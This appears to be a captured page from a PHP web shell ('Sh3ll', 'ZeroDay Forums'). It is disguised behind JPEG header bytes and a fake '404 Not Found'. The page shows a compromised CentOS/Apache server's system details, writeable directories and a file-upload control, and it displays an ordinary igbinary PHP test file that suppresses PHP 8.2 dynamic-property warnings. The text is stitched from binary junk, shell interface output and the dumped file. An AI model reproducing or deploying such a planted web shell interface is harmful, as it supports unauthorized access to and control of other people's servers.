����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /usr/share/tests/pecl/igbinary/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/tests/pecl/igbinary/tests/php82_suppress_dynamic_properties_warning.inc
<?php
if (PHP_VERSION_ID < 80200) {
    return;
}
$totalErrors = 0;
function igbinary_suppress_dynamic_properties_warning($errno, $errstr): bool {
    if ($errno === E_DEPRECATED && str_contains($errstr, 'Creation of dynamic property')) {
        $GLOBALS['totalErrors']++;
        return true;
    }
    return false;
}
set_error_handler('igbinary_suppress_dynamic_properties_warning');

function igbinary_expect_warn_dynamic_properties(): void {
    if ($GLOBALS['totalErrors'] < 1) {
        echo "Expected this test to have at least one warning about creating dynamic properties in php 8.2\n";
    }
}
register_shutdown_function('igbinary_expect_warn_dynamic_properties');

ZeroDay Forums Mini